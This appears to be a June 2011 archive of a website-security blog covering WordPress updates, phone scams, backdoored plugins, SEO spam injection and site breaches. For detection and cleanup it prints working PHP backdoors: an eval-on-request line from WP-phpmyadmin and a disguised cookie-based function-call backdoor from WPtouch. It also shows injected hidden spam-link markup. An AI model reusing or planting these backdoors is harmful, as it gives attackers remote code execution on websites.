Archives for June 2011

WordPress 3.1.4 available – Time to update

If you are running WordPress, it is time to update it now. WordPress v3.1.4 was just released with security fixes for all the previous versions (specially important with you have users with the editor-level permissions):

From the WordPress blog:

WordPress 3.1.4 is available now and is a maintenance and security update for all previous versions.


This release fixes an issue that could allow a malicious Editor-level user to gain further access to the site. Thanks K. Gudinavicius of SEC Consult for bringing this to our attention. Version 3.1.4 also incorporates several other security fixes and hardening measures thanks to the work of WordPress developers Alexander Concha and Jon Cave of our security team. Consult the change log for more details.

List of modified files:

Files wordpress-3.1.3/readme.html and wordpress-3.1.4/readme.html differ
Files wordpress-3.1.3/wp-admin/custom-header.php and wordpress-3.1.4/wp-admin/custom-header.php differ
Files wordpress-3.1.3/wp-admin/includes/deprecated.php and wordpress-3.1.4/wp-admin/includes/deprecated.php differ
Files wordpress-3.1.3/wp-admin/includes/media.php and wordpress-3.1.4/wp-admin/includes/media.php differ
Files wordpress-3.1.3/wp-admin/includes/post.php and wordpress-3.1.4/wp-admin/includes/post.php differ
Files wordpress-3.1.3/wp-admin/includes/update-core.php and wordpress-3.1.4/wp-admin/includes/update-core.php differ
Files wordpress-3.1.3/wp-admin/js/ and wordpress-3.1.4/wp-admin/js/ differ
Files wordpress-3.1.3/wp-admin/js/user-profile.js and wordpress-3.1.4/wp-admin/js/user-profile.js differ
Files wordpress-3.1.3/wp-admin/options-general.php and wordpress-3.1.4/wp-admin/options-general.php differ
Files wordpress-3.1.3/wp-content/themes/twentyten/languages/twentyten.pot and wordpress-3.1.4/wp-content/themes/twentyten/languages/twentyten.pot differ
Files wordpress-3.1.3/wp-includes/bookmark.php and wordpress-3.1.4/wp-includes/bookmark.php differ
Files wordpress-3.1.3/wp-includes/formatting.php and wordpress-3.1.4/wp-includes/formatting.php differ
Files wordpress-3.1.3/wp-includes/post.php and wordpress-3.1.4/wp-includes/post.php differ
Files wordpress-3.1.3/wp-includes/query.php and wordpress-3.1.4/wp-includes/query.php differ
Files wordpress-3.1.3/wp-includes/script-loader.php and wordpress-3.1.4/wp-includes/script-loader.php differ
Files wordpress-3.1.3/wp-includes/taxonomy.php and wordpress-3.1.4/wp-includes/taxonomy.php differ
Files wordpress-3.1.3/wp-includes/version.php and wordpress-3.1.4/wp-includes/version.php differ
Files wordpress-3.1.3/wp-includes/wp-db.php and wordpress-3.1.4/wp-includes/wp-db.php differ
Files wordpress-3.1.3/wp-settings.php and wordpress-3.1.4/wp-settings.php differ

If you are using WordPress, you can also scan it here for security issues and malware:

Phishing phone calls –

It was early morning (around 8am) and I received a phone call from someone asking for me by name (using a private number and with a strong Indian accent):

Caller: Hello, Can I speak with XX?” (my real name)

Me: Sure, it is me.

Caller: Hello, I am calling from Online Support because there are some serious warnings coming from our Windows Server saying that your computer is compromised.

Me: Wow, it is?

At this point I was aware of what wass going on. This group from India has been calling thousands of numbers scaring people that their computer is compromised and convincing them to buy their service or install their software.

Read More

WP-phpmyadmin WordPress plugin – Delete it now

If you are using the WP-phpmyadmin WordPress plugin, delete it now. We are seeing multiple sites getting hacked through it and we are investigating what is going on.

On all the sites we’ve analyzed, the following code was found inside the wp-phpmyadmin/phpmyadmin/upgrade.php file:

<?php if(isset($_REQUEST["asc"]))eval(stripslashes($_REQUEST["asc"])); ?>

This is not part of the plugin, and should be removed immediately!

The code snippet above is a backdoor and allows remote access to the affected sites with it installed.

We also noticed that it was removed from the WordPress plugin repository (originally here: ) and is no longer maintained (last update in 2007). Since it is not longer being updated, you shouldn’t be using it anymore.

EDIT: We had an opportunity to catch up with Andrew Nacin, a WordPress Core Member who stated:

The reason it had been pulled from the directory was that it had phpMyAdmin setup files in it, which can expose server information.

So the plugin wasn’t removed because of any security issue, but because of the recent weird activity and due to the fact that it is not maintained, we recommend deleting it as soon as possible.

If you’re seeing anything out of the ordinary, please let us know. If we find anything else, we will update the post.

If you are not sure if your site got hacked, you can scan it here:

WordPress plugins hacked – Understanding the backdoor

If you haven’t heard about it already, yesterday three popular WordPress plugins (AddThis, WPtouch, and W3 Total Cache) had a malicious backdoor added to them via the plugin repository. That lead to resetting all passwords as a precaution. You can read about it here: Passwords Reset. I must note that the team did a amazing job dealing with this incident and getting it all fixed very fast!

However, what is interesting to us is what the team said:

Earlier today the WordPress team noticed suspicious commits to several popular plugins (AddThis, WPtouch, and W3 Total Cache) containing cleverly disguised backdoors.

Cleverly disguised backdoors? That’s something we wanted to check. We went to their repositories and found this in the WPtouch changelog:

 if (preg_match("#useragent/([^/]*)/([^/]*)/#i", $_COOKIE[$key], $matches) && $matches[1]($matches[2]))  
                $this->desired_view = $matches[1]&#46$matches[2]; 

What does this code do

Someone skimming through the code may not see anything with malicious intent there. However, it checks if a specific COOKIE is set, and if it is, it parses the content into the $matches variable. After that, it executes the code by calling ($matches[1]($matches[2])) ). That is possible because variable names can be called as functions in PHP (so matches1 is the name, and matches2 the argument of the function).

So someone could set the cookie to eval, or even system/exec, and run any command on the target site as the web server user.

Kudos to the WordPress Core Team

Again, very clever backdoor and I am impressed that the WordPress team caught this in the middle of so many plugins and commits. I wasn’t able to check the other plugins, because it seems that is down at the moment.

Another thing to highlight, which Matt stated in the news release on, is make sure you update your plugins. By making sure your software is up to date, you have the latest patches and security fixes which in turn lowers your risk of security issues.

If you are worried your site might have been hacked, try scanning it with Sucuri SiteCheck to see if there is anything wrong.

Backup, backup and backup

We just heard of a sad story about an Australian web hosting company (Distribute.IT) that was hacked and all of the sites they hosted were deleted (almost 5 thousand of them). What’s even worse is that the attackers deleted and corrupted their backup archives, so they were not able to recover any of the files.

Yes, it means almost 5 thousand users lost all of their data. Hopefully, some of them had an offsite backup, but most of them didn’t. You can read the whole story here.

This is the important part:

“At this time, We regret to inform that the data, sites and emails that were hosted on Drought, Hurricane, Blizzard and Cyclone can be considered by all the experts to be unrecoverable,”

Wow. Make sure to start backing up your sites right now if you are not doing so. And choose an off site backup location if possible.

Google blacklisted all the domains

It seems that Google just blacklisted all the sites under the main domain (including the, and all others). In their status page Google says:

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, appeared to function as an intermediary for the infection of 13788 site(s) including,,

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 47193 domain(s), including,,

So according to Google, they infected more than 47 thousand domains. It is interesting because in the last few months the .cc TLD has been the most used by attackers, but it seems that Google decided to just blacklist everything (probably by mistake).

You can see this warning, by checking the status page on google for any site ending in :

What is the current listing status for

Site is listed as suspicious – visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 2907 time(s) over the past 90 days.

We will post more details if we learn back from Google.

Blackhat SPAM SEO From – Targeting Joomla

We are tracking another Blackhat SEO SPAM network being managed by By the name of the domain, you can guess that they are targeting Joomla sites.

When you visit a compromised site, you don’t see anything wrong, but if you view the source, there is a large block of spammy links hidden in there:

<span style="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px">
<a href="http://www&#46nigeriavillagesquare&#46com/t3-assets/css/index&#46php">ACD
 Systems Canvas 11 with GIS Plus</a><br><a href="http://www&#46nigeriavillagesquar…. hundreds more links…

All those links are generated by (or global.php), which gets called on the Joomla site by the following code added to the templates index.php:

<?php readfile("");

If you have a Joomla site make sure it is updated. You can check if it has not been compromised with this crud by viewing the source of your site, or scanning it in here: Sucuri SiteCheck. If you see a warning about SEO SPAM on our scanner, you know your site is hacked.

What’s interesting is that if you search for on Google, you will get thousands of sites found because of this warning:

“Warning: readfile(” failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or …

Which probably happened when the joomlapoject site was down, causing all those errors.

If your site is hacked or compromised, we can help! Sign up here for any of our plans to get it sorted out:

Information Leakage on multiple WordPress themes by WooThemes

This weekend there was a post on the Full disclosure list about multiple vulnerabilities on some WordPress themes by WooThemes. This is what the message said:

Vulnerable are the next themes by WooThemes: Live Wire (all three themes from Live Wire series), Gotham News, Typebased, Blogtheme, VibrantCMS, Fresh News, The Gazette Edition, NewsPress, The Station, The Original Premium News, Flash News, Busy Bee, Geometric…


In different themes there is test.php – script with phpinfo() – which leads to Information Leakage (disclosure of FPD and other important information about the server) and XSS (in PHP < 4.4.1, 4.4.3-4.4.6).

So what exactly is going on? Basically, these themes include a “test.php” file that prints the output of phpinfo(), leaking some internal information about the server (internal path, modules, versions, etc). This information leakage by itself is not serious, but can be used by an attacker when trying to hack the site. The other issue (XSS – cross site scripting) is a bug on PHP4 itself and does not affect anyone using PHP5 (which I hope is everybody).

So, if you are using any of those themes, it is a good idea to remove this test.php file, since debugging code shouldn’t be on production sites. If you are running PHP4, you have bigger issues than this XSS/information leakage, we recommend getting your software up to date!

Running WordPress? Scan your site for free to see if it has any malware or security issues:

Sony Music Brazil hacked (yet another sony defacement)

I hate to pick on Sony, but they got hacked again (and no, I am not talking about the Lulzsec + sonypictures, this is another one). This time was Sony Music Brazil, which was defaced yesterday night and STILL is defaced after more than 10 hours. That’a a bit too long, even for sony…

Link of the hack: http://www.sonymusic


What a month for them…

Links Injection on WordPress – Blackhat SEO Spam (basicpills) update

For the last few months we’ve been tracking a very large blackhat SEO spam campaign initiated by, and many other pharma-related domains (mostly located at and

The method used is very simple, where the attackers inject a single spam link on every post of the web site (generally WordPress). These are some of the links you will see in an infected site:

<a href="http://247pharmaceutical. com/">online prescription drugs without  a prescription..

<a href="http://webemed. com/">Buy  Generic  Cialis Onlin.

<a href="http://getrxpills . com/buy/levi tra.html”>lev itra 10 mg..

The really annoying part is that the domain and anchor text change on every post, making it very hard to delete and detect. These are some of the domains being used:

Some of these domains are being registered through Godaddy by:

Administrative Contact:
York, Steve
6041 Pierless Ave
Sugar Hill, GA 30518
United States
7709450281 Fax —

And we would love to get them disabled.

For the site owners out there, you can check if your site has been infected by scanning it with our malware and spam scanner. It will show if these links have been added, and if you have other security issues. If your site has been hacked, we recommend changing your DB passwords immediately, and checking the permissions of your wp-config.php file.

If you need help cleaning up the mess, send us an email, or visit us over at Sucuri.

If you have any questions or comments, please let us know.